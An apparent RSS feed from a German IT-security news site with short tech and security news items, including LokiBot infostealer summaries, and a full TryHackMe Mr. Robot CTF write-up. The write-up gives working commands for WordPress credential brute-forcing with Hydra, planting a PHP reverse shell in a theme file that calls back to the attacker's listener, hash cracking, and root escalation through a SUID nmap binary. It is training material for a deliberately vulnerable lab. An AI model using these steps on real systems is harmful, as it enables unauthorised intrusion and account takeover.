<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/libpng">libpng up to 1.5.25</a>. Affected by this issue is the function <code>png_check_keyword</code> of the file <em>pngwutil.c</em>. The manipulation leads to numeric error.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2015-8540">CVE-2015-8540</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of June 21, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of June 21, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3631197/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-21-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631197/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-21-2026/</guid>
<pubDate>Sun, 28 Jun 2026 17:03:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of June 21, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-06-21/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Handwerk statt Homeoffice: Wie KI die Berufswünsche der Jugend verändert]]></title>
<description><![CDATA[Junge Menschen äußern verstärkt den Wunsch, im Job etwas mit den Händen zu erschaffen. Dass auch Berufe im Bauwesen und Handwerk zunehmend digital sind, wird allerdings noch von vielen unterschätzt.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3630888/it-nachrichten/handwerk-statt-homeoffice-wie-ki-die-berufswuensche-der-jugend-veraendert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630888/it-nachrichten/handwerk-statt-homeoffice-wie-ki-die-berufswuensche-der-jugend-veraendert/</guid>
<pubDate>Sun, 28 Jun 2026 12:17:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Junge Menschen äußern verstärkt den Wunsch, im Job etwas mit den Händen zu erschaffen. Dass auch Berufe im Bauwesen und Handwerk zunehmend digital sind, wird allerdings noch von vielen unterschätzt.
<a href="https://t3n.de/news/handwerk-statt-homeoffice-wie-ki-die-berufswuensche-der-jugend-veraendert-1749944/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Theater: Mein bedrohliches Gedicht (fusion26)]]></title>
<description><![CDATA[Das Stück verarbeitet autobiografisch die Verhaftung und Inhaftierung der palästinensischen Lyrikerin Dareen Tatour. Nach ihrer Festnahme 2015 wurde sie zu fünf Monaten Gefängnis und drei Jahren Hausarrest verurteilt; ihr Fall erregte internationale Aufmerksamkeit. Der Monolog erzählt von Einschü...]]></description>
<link>https://tsecurity.de/de/3628700/it-security-video/theater-mein-bedrohliches-gedicht-fusion26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628700/it-security-video/theater-mein-bedrohliches-gedicht-fusion26/</guid>
<pubDate>Sat, 27 Jun 2026 00:48:23 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Stück verarbeitet autobiografisch die Verhaftung und Inhaftierung der palästinensischen Lyrikerin Dareen Tatour. Nach ihrer Festnahme 2015 wurde sie zu fünf Monaten Gefängnis und drei Jahren Hausarrest verurteilt; ihr Fall erregte internationale Aufmerksamkeit. Der Monolog erzählt von Einschüchterung, Entmenschlichung, aber auch von Solidarität, Widerstand und Selbstermächtigung. Die Performance fragt mit feinem Humor nach der Rolle von Kunstfreiheit und Kunst als Mittel des Widerstands.

Language: EN Translation: YES Video Recording: YES

This play is an autobiographical account of the arrest and imprisonment of Palestinian poet Dareen Tatour. Following her arrest in 2015, she was sentenced to five months in prison and three years of house arrest; her case drew international attention. The monologue explores intimidation and dehumanization, but also solidarity, resistance, and self-empowerment. In its German premiere, the performance examines the role of artistic freedom and art as a means of resistance.

Language: EN Translation: YES Video Recording: YES

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Russland umgeht Cellebrite-Beschränkungen und hackt iPhones - Zamin.uz]]></title>
<description><![CDATA[Moderne Cybersicherheits-Tools und Smartphone-Hacking-Technologien können nicht nur zur Verbrechensbekämpfung, sondern auch als Waffe gegen die ...]]></description>
<link>https://tsecurity.de/de/3624825/hacking/russland-umgeht-cellebrite-beschraenkungen-und-hackt-iphones-zaminuz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624825/hacking/russland-umgeht-cellebrite-beschraenkungen-und-hackt-iphones-zaminuz/</guid>
<pubDate>Thu, 25 Jun 2026 16:09:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Moderne Cybersicherheits-Tools und Smartphone-<b>Hacking</b>-Technologien können nicht nur zur Verbrechensbekämpfung, sondern auch als Waffe gegen die ...]]></content:encoded>
</item>
<item>
<title><![CDATA[LokiBot Malware Uses API Hashing and 3DES-Encrypted C2 to Hide Infostealer Activity]]></title>
<description><![CDATA[LokiBot, a long-lived infostealer first advertised in May 2015, continues to evolve. Recent samples demonstrate deliberate attempts to evade static detection and frustrate analysis by combining API hashing with 3DES-encrypted command-and-control (C2) configuration stored inside the binary. The re...]]></description>
<link>https://tsecurity.de/de/3624517/it-security-nachrichten/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624517/it-security-nachrichten/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/</guid>
<pubDate>Thu, 25 Jun 2026 14:39:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LokiBot, a long-lived infostealer first advertised in May 2015, continues to evolve. Recent samples demonstrate deliberate attempts to evade static detection and frustrate analysis by combining API hashing with 3DES-encrypted command-and-control (C2) configuration stored inside the binary. The result is…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/">LokiBot Malware Uses API Hashing and 3DES-Encrypted C2 to Hide Infostealer Activity</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LokiBot Malware Uses API Hashing and 3DES-Encrypted C2 to Hide Infostealer Activity]]></title>
<description><![CDATA[LokiBot, a long-lived infostealer first advertised in May 2015, continues to evolve. Recent samples demonstrate deliberate attempts to evade static detection and frustrate analysis by combining API hashing with 3DES-encrypted command-and-control (C2) configuration stored inside the binary. The re...]]></description>
<link>https://tsecurity.de/de/3624476/it-security-nachrichten/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624476/it-security-nachrichten/lokibot-malware-uses-api-hashing-and-3des-encrypted-c2-to-hide-infostealer-activity/</guid>
<pubDate>Thu, 25 Jun 2026 14:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LokiBot, a long-lived infostealer first advertised in May 2015, continues to evolve. Recent samples demonstrate deliberate attempts to evade static detection and frustrate analysis by combining API hashing with 3DES-encrypted command-and-control (C2) configuration stored inside the binary. The result is a compact, stealthy loader that reconstructs and executes a traditional LokiBot payload while limiting observable […]</p>
<p>The post <a href="https://gbhackers.com/lokibot-malware-uses-api-hashing/">LokiBot Malware Uses API Hashing and 3DES-Encrypted C2 to Hide Infostealer Activity</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Datacentres facing increase in global climate-related legal cases, report finds]]></title>
<description><![CDATA[LSE analysis highlights litigation linked to energy sources, water consumption and air pollutionThe proliferation of datacentres and AI is increasingly at the forefront of environmental litigation around the world from Chile to Ireland, a report has found.In an analysis of about 3,600 climate-rel...]]></description>
<link>https://tsecurity.de/de/3624092/ai-nachrichten/datacentres-facing-increase-in-global-climate-related-legal-cases-report-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624092/ai-nachrichten/datacentres-facing-increase-in-global-climate-related-legal-cases-report-finds/</guid>
<pubDate>Thu, 25 Jun 2026 12:18:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LSE analysis highlights litigation linked to energy sources, water consumption and air pollution</p><p>The proliferation of datacentres and AI is increasingly at the forefront of environmental litigation around the world from Chile to Ireland, a report has found.</p><p>In an analysis of about 3,600 climate-related lawsuits filed since 2015, the <a href="http://www.lse.ac.uk/granthaminstitute/publication/global-trends-in-climate-change-litigation-2026-snapshot">latest annual review of climate litigation</a><strong> </strong>by the London School of Economics (LSE) found a growing number of cases challenging the energy sources, water consumption and air pollution of datacentres, all of which have related climate implications.</p> <a href="https://www.theguardian.com/environment/2026/jun/25/datacentres-facing-increase-in-global-climate-related-legal-cases-report-finds">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[LokiBot Infostealer Uses Obfuscated JScript and PowerShell Loader in Recent Campaign]]></title>
<description><![CDATA[LokiBot is a persistent infostealer that first surfaced in 2015. Despite a slight reduction in activity over recent years, it remains a formidable threat due to its affordability and wide-ranging capabilities. A recent campaign demonstrates that attackers continue to rely on LokiBot to steal cred...]]></description>
<link>https://tsecurity.de/de/3624038/it-security-nachrichten/lokibot-infostealer-uses-obfuscated-jscript-and-powershell-loader-in-recent-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624038/it-security-nachrichten/lokibot-infostealer-uses-obfuscated-jscript-and-powershell-loader-in-recent-campaign/</guid>
<pubDate>Thu, 25 Jun 2026 12:08:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>LokiBot is a persistent infostealer that first surfaced in 2015. Despite a slight reduction in activity over recent years, it remains a formidable threat due to its affordability and wide-ranging capabilities. A recent campaign demonstrates that attackers continue to rely on LokiBot to steal credentials from over 100 software products, including browsers, cryptocurrency wallets, and […]</p>
<p>The post <a href="https://cyberpress.org/lokibot-uses-obfuscated-loaders/">LokiBot Infostealer Uses Obfuscated JScript and PowerShell Loader in Recent Campaign</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Erfolgreich Petitieren – wie geht das? (tdf2026)]]></title>
<description><![CDATA[Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unterzubringen und die notwendige Unterzeichner zu erreichen?

Bundesweit ein Recht auf Steckersolar, einfachere Nutzung ...]]></description>
<link>https://tsecurity.de/de/3622555/it-security-video/erfolgreich-petitieren-wie-geht-das-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622555/it-security-video/erfolgreich-petitieren-wie-geht-das-tdf2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:50:13 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unterzubringen und die notwendige Unterzeichner zu erreichen?

Bundesweit ein Recht auf Steckersolar, einfachere Nutzung von Steckerspeichern und im ELÄND eine Anti-Palantir Petition. 

* Aber wie macht man das jetzt mit der großen Petition? 
* Was sollte ich vor dem Einbringen beachten? 
* Wie läuft der Auftritt im Ausschuss? 
* Wie gehe ich mit den Medien um? 
* Welche Themen eignen sich?
* Wie gewinne ich Partner?
* Welche Partner bringen uns weiter?

Im kurzen Talk gibt Sebastian Tipps.

* BalkonSolar: https://balkon.solar/news/2023/04/29/balkonsolar-petition-beim-bundestag-endet-mit-101877-unterzeichnungen/
* SteckerSpeicher: https://balkon.solar/news/2024/11/16/petition-die-zweite-kleinspeicher-entfesseln-stromnetz-stabilisieren/
* Jugendbeteiligung: https://studiengruppejugendbeteiligung.wordpress.com/2015/10/17/landtag-von-baden-wuerttemberg-beschliesst-aenderung-des-%c2%a7-41a-der-gemeindeordnung/
* Anti Palantir: https://sbamueller.com/2025/11/06/anhoerung-der-oeffentlichen-petitionen-keine-nutzung-der-software-gotham-von-palantir-in-baden-wuerttemberg-am-do-6-november-2025-1300/

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/XUAHVX/]]></content:encoded>
</item>
<item>
<title><![CDATA[Agility Robotics plans to go public via SPAC in a $2.5B deal]]></title>
<description><![CDATA[Agility Robotics, the humanoid robotics startup that spun out of Oregon State University in 2015, expects to generate $620 million in proceeds.]]></description>
<link>https://tsecurity.de/de/3622191/ai-nachrichten/agility-robotics-plans-to-go-public-via-spac-in-a-25b-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622191/ai-nachrichten/agility-robotics-plans-to-go-public-via-spac-in-a-25b-deal/</guid>
<pubDate>Wed, 24 Jun 2026 18:49:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agility Robotics, the humanoid robotics startup that spun out of Oregon State University in 2015, expects to generate $620 million in proceeds.]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Mr. Robot CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Mr. Robot CTFDifficulty: MediumAuthor: Shikhali Jamalzade (@alisalive)Date: May 2026Tags: #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.” — Mr. RobotIntroductionThe Mr. ...]]></description>
<link>https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oEKhllKIF6aLRt62C2KnOQ.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/mrrobot">Mr. Robot CTF</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> Shikhali Jamalzade (<a href="https://github.com/alisalive">@alisalive</a>)<br><strong>Date:</strong> May 2026<br><strong>Tags:</strong> #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot</h4><p><em>“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.”</em> — Mr. Robot</p><h3>Introduction</h3><p>The <strong>Mr. Robot CTF</strong> room on TryHackMe is inspired by the cult TV series of the same name — a show about hacking, manipulation, and power. Created by security researcher <strong>Leon Johnson</strong>, the room presents a realistic attack surface: a WordPress-powered web server with deliberately weak credentials and a classic privilege escalation vector involving a SUID binary.</p><p>Your mission: find <strong>3 hidden keys</strong> on the machine.</p><p>In this write-up, I’ll walk through every step of the compromise — from initial reconnaissance all the way to root. I’ll explain the <em>why</em> behind each tool and technique, not just the <em>how</em>.</p><h3>Environment Setup</h3><p>Before anything, connect to the TryHackMe VPN:</p><p>bash</p><pre>sudo openvpn your-config.ovpn</pre><p>Once connected, deploy the Mr. Robot machine from the room page. Note the assigned IP (referred to as &lt;TARGET_IP&gt; throughout this write-up).</p><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Port Scan</h3><p>Every engagement begins with understanding the attack surface. We’ll use <strong>nmap</strong> to identify open ports, services, and versions.</p><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Flag breakdown:</strong></p><ul><li>-sC — Run default NSE scripts (useful for detecting common vulns and misconfigs)</li><li>-sV — Probe service versions</li><li>-T4 — Aggressive timing (faster on stable networks)</li><li>-oN — Save output to file for reference</li></ul><p><strong>Results:</strong></p><pre>PORT    STATE  SERVICE  VERSION<br>80/tcp  open   http     Apache httpd<br>443/tcp open   ssl/http Apache httpd<br>22/tcp  closed ssh</pre><p>Two web servers (HTTP + HTTPS) are running on a standard Apache stack. SSH is closed, so our initial foothold will be through the web.</p><h3>Phase 2 — Web Enumeration</h3><h3>Visiting the Website</h3><p>Navigate to http://&lt;TARGET_IP&gt; in your browser. You'll be greeted by an interactive terminal simulation themed around the Mr. Robot show. It's visually impressive but doesn't contain anything useful for exploitation — feel free to play around though.</p><h3>robots.txt — The First Lead</h3><p>A robots.txt file tells web crawlers which paths to avoid. It's frequently overlooked by developers, but for pentesters it's a goldmine.</p><p>bash</p><pre>curl http://&lt;TARGET_IP&gt;/robots.txt</pre><p><strong>Output:</strong></p><pre>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt</pre><p>Two files are disclosed:</p><ul><li>fsocity.dic — a wordlist (we'll use this to brute-force WordPress)</li><li>key-1-of-3.txt — the first flag</li></ul><p>Download both immediately:</p><p>bash</p><pre>wget http://&lt;TARGET_IP&gt;/fsocity.dic<br>wget http://&lt;TARGET_IP&gt;/key-1-of-3.txt<br>cat key-1-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 1:</em></strong><em> </em><em>073403c8a58a1f80d943455fb30724b9</em></blockquote><h3>Directory Brute-Forcing with Gobuster</h3><p>To map the full attack surface, we enumerate hidden directories:</p><p>bash</p><pre>gobuster dir -u http://&lt;TARGET_IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50</pre><p>Key findings:</p><pre>/wp-login    (Status: 200)<br>/wp-admin    (Status: 301)<br>/robots      (Status: 200)<br>/readme      (Status: 200)<br>/sitemap     (Status: 200)<br>/wp-content  (Status: 301)</pre><p>The presence of /wp-login confirms this is a <strong>WordPress</strong> installation. This opens up a well-documented attack path.</p><h3>Phase 3 — WordPress Credential Brute-Force</h3><h3>Preparing the Wordlist</h3><p>The fsocity.dic file contains <strong>858,160 words</strong> — most of them duplicates. Running a brute-force with this as-is would waste significant time. We deduplicate it first:</p><p>bash</p><pre>wc -w fsocity.dic         # 858160 words<br>sort fsocity.dic | uniq &gt; fs-clean.txt<br>wc -w fs-clean.txt        # 11451 words — a 98.7% reduction</pre><p>Always optimize your wordlists before launching attacks. Speed matters in real engagements.</p><h3>Username Enumeration with Hydra</h3><p>WordPress gives different error messages depending on whether a username exists:</p><ul><li>Invalid username → ERROR: Invalid username.</li><li>Valid username, wrong password → ERROR: The password you entered for the username … is incorrect.</li></ul><p>We exploit this <strong>username enumeration</strong> vulnerability to find valid users first, then pivot to password brute-forcing.</p><p>Start by capturing a failed login request with <strong>Burp Suite</strong> to identify the POST parameters (log and pwd). Then launch Hydra:</p><p>bash</p><pre>hydra -L fs-clean.txt -p test &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><ul><li>-L fs-clean.txt — username wordlist</li><li>-p test — static placeholder password (we only care about username validity here)</li><li>F=Invalid username — string that indicates a failed attempt (Hydra ignores these)</li></ul><p><strong>Result:</strong> Valid username found → elliot</p><h3>Password Brute-Force</h3><p>Now that we have a valid username, we brute-force the password using the same deduplicated list:</p><p>bash</p><pre>hydra -l elliot -P fs-clean.txt &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p><strong>Result:</strong> Password found → ER28-0652</p><p><strong>Alternative — WPScan:</strong></p><p>bash</p><pre>wpscan --url http://&lt;TARGET_IP&gt; -U elliot -P fs-clean.txt -t 50</pre><p>WPScan is purpose-built for WordPress and tends to be faster for this specific task.</p><h3>Phase 4 — WordPress Remote Code Execution</h3><h3>Gaining Admin Access</h3><p>Navigate to http://&lt;TARGET_IP&gt;/wp-login.php and log in with:</p><ul><li><strong>Username:</strong> elliot</li><li><strong>Password:</strong> ER28-0652</li></ul><p>Elliot has full administrator privileges. Welcome to the dashboard.</p><h3>Uploading a PHP Reverse Shell</h3><p>WordPress administrators can edit theme template files — raw PHP. This is our injection point.</p><p>Navigate to: <strong>Appearance → Theme Editor → Select a template (e.g., </strong><strong>archive.php or </strong><strong>404.php)</strong></p><p>Replace the entire file content with <strong>PentestMonkey’s PHP reverse shell</strong>:</p><pre>https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</pre><p>Before saving, edit these two lines to match your attacking machine:</p><p>php</p><pre>$ip = '&lt;YOUR_ATTACKING_IP&gt;';   // your TryHackMe VPN IP (tun0)<br>$port = 4444;                   // or any port you choose</pre><p>Click <strong>Update File</strong>.</p><h3>Setting Up the Listener</h3><p>On your attacking machine:</p><p>bash</p><pre>nc -lvnp 4444</pre><h3>Triggering the Shell</h3><p>Now visit the modified template URL in your browser. For the archive.php template, it would be:</p><pre>http://&lt;TARGET_IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><p>Check your terminal — you should have a reverse shell as daemon:</p><p>bash</p><pre>$ whoami<br>daemon</pre><h3>Phase 5 — Post-Exploitation &amp; Key 2</h3><h3>Exploring the Filesystem</h3><p>Navigate to the home directory:</p><p>bash</p><pre>cd /home/robot<br>ls -la</pre><p><strong>Output:</strong></p><pre>-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt<br>-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5</pre><p>We can see key-2-of-3.txt, but it's only readable by the robot user. However, password.raw-md5 is world-readable:</p><p>bash</p><pre>cat password.raw-md5</pre><p><strong>Output:</strong></p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><h3>Cracking the MD5 Hash</h3><p>The hash format is MD5 (hinted by the filename). Crack it using:</p><p><strong>Option 1 — CrackStation (online):</strong> Paste the hash at <a href="https://crackstation.net/">crackstation.net</a></p><p><strong>Option 2 — John the Ripper:</strong></p><p>bash</p><pre>echo "c3fcd3d76192e4007dfb496cca67e13b" &gt; hash.txt<br>john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Option 3 — Hashcat:</strong></p><p>bash</p><pre>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> abcdefghijklmnopqrstuvwxyz</p><h3>Spawning a Proper TTY Shell</h3><p>Before switching users, we need a fully interactive terminal. Our current shell is a limited “dumb” shell that doesn’t support su. Fix it with Python's pty module:</p><p>bash</p><pre>python -c 'import pty; pty.spawn("/bin/bash")'</pre><p>Now switch to the robot user:</p><p>bash</p><pre>su robot<br># Password: abcdefghijklmnopqrstuvwxyz</pre><p>Read the second key:</p><p>bash</p><pre>cat /home/robot/key-2-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 2:</em></strong><em> </em><em>822c73956184f694993bebb3eb32f0bf</em></blockquote><h3>Phase 6 — Privilege Escalation to Root</h3><p>With robot, we still can't read the third key (located in /root). We need to escalate to root.</p><h3>Finding SUID Binaries</h3><p>SUID (Set User ID) binaries run with the permissions of their <strong>owner</strong> (often root), regardless of who executes them. This is a common and powerful escalation vector.</p><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Scan the results. Something unusual stands out:</p><pre>/usr/local/bin/nmap</pre><p><strong>Nmap with SUID?</strong> That’s misconfigured. Older versions of nmap (2.02–5.21) include an --interactive mode that allows shell command execution.</p><h3>GTFOBins — nmap Interactive Mode</h3><p>Verify on <a href="https://gtfobins.github.io/gtfobins/nmap/">GTFOBins</a>:</p><p>bash</p><pre>nmap --interactive</pre><p>Once in nmap’s interactive prompt:</p><pre>nmap&gt; !sh</pre><p>Check your privilege level:</p><p>bash</p><pre>whoami<br># root</pre><p>You now have a root shell.</p><h3>Capturing the Final Key</h3><p>bash</p><pre>cat /root/key-3-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 3:</em></strong><em> </em><em>04787ddef27c3dee1ee161b21670b4e4</em></blockquote><h3>Attack Chain Summary</h3><pre>robots.txt disclosure<br>        ↓<br>Key 1 found (public file)<br>        ↓<br>WordPress discovered via gobuster<br>        ↓<br>Username enumerated via error message difference<br>        ↓<br>Password cracked via Hydra + fsocity.dic wordlist<br>        ↓<br>Admin access → PHP reverse shell injected into theme<br>        ↓<br>Shell as daemon → /home/robot/ explored<br>        ↓<br>MD5 hash cracked → su robot → Key 2<br>        ↓<br>SUID nmap found → nmap --interactive → !sh → root<br>        ↓<br>Key 3 captured</pre><h3>Lessons Learned</h3><p><strong>1. robots.txt is not security.</strong> It’s a disclosure mechanism by design — never put sensitive file paths there.</p><p><strong>2. WordPress login pages expose usernames.</strong> The different error messages for “invalid username” vs “wrong password” enable user enumeration. This is a long-standing WordPress issue.</p><p><strong>3. Wordlist hygiene matters.</strong> Deduplicating fsocity.dic reduced it from 858,160 to 11,451 entries — making the brute-force ~75x faster. Never throw raw wordlists at targets.</p><p><strong>4. Theme editors are code execution.</strong> Any CMS that lets admins write raw PHP to disk is one compromised account away from full RCE.</p><p><strong>5. SUID misconfigurations are everywhere.</strong> Always run find / -perm -u=s -type f 2&gt;/dev/null on post-exploitation. Cross-reference with GTFOBins.</p><p><strong>6. MD5 is not encryption.</strong> It’s a hashing algorithm, and short/predictable passwords will fall to rainbow tables instantly. Use bcrypt, Argon2, or scrypt for password storage.</p><h3>Tools Used</h3><p>Tool Purpose nmap Port scanning &amp; service enumeration gobuster Directory brute-forcing Burp Suite HTTP request interception &amp; analysis Hydra Credential brute-forcing WPScan WordPress-specific enumeration Pentest Monkey PHP Reverse Shell Remote code execution payload Netcat Reverse shell listener John the Ripper / Hashcat Hash cracking GTFOBins SUID exploitation reference</p><h3>Flags</h3><p>1073403c8a58a1f80d943455fb30724b9<br>2822c73956184f694993bebb3eb32f0bf<br>304787ddef27c3dee1ee161b21670b4e4</p><p><em>Thanks for reading. If you have questions or spotted a better path, drop a comment — I’m always up for discussing alternative techniques.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.<br></em>and my <a href="https://tryhackme.com/p/alisalive.exe"><em>TryHackMe</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f28d83777dde" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-mr-robot-ctf-full-write-up-f28d83777dde">TryHackMe — Mr. Robot CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Developer resource Swift Package Index to stay open source after Apple acquisition]]></title>
<description><![CDATA[The Swift Package Index is no longer independent as Apple has taken control, but it will remain an open source search engine for third-party code.Swift icon - image credit: AppleIt's now a startling 12 years since Apple launched its Swift programming language for apps, and key to it from 2015 has...]]></description>
<link>https://tsecurity.de/de/3621573/ios-mac-os/developer-resource-swift-package-index-to-stay-open-source-after-apple-acquisition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621573/ios-mac-os/developer-resource-swift-package-index-to-stay-open-source-after-apple-acquisition/</guid>
<pubDate>Wed, 24 Jun 2026 15:52:39 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The <a href="https://appleinsider.com/inside/swift" title="Swift" data-kpt="1">Swift</a> Package Index is no longer independent as Apple has taken control, but it will remain an open source search engine for third-party code.<br><br><div><img src="https://photos5.appleinsider.com/gallery/62507-129604-61319-126674-swift-xl-xl.jpg" alt="Swift logo featuring a stylized orange swift bird on a blue gradient background with subtle programming code visible behind the bird." height="738"><br><span>Swift icon - image credit: Apple</span></div><br>It's now a startling <a href="https://appleinsider.com/articles/14/06/02/apple-unveils-swift-a-brand-new-xcode-programming-language-for-developers">12 years</a> since Apple launched its Swift programming language for apps, and key to it <a href="https://appleinsider.com/articles/15/12/03/apple-programming-language-swift-goes-open-source">from 2015</a> has been that it is open source. The aim was to build a community of developers, and one group that helped this <a href="https://appleinsider.com/articles/21/04/08/macstadium-offers-free-cloud-based-mac-mini-for-open-source-developers">was behind</a> the Swift Package Index.<br><br>The Swift Package Index gave developers one trusted location to look for third-party code for use in their own apps. The idea has always been that developers can find code that 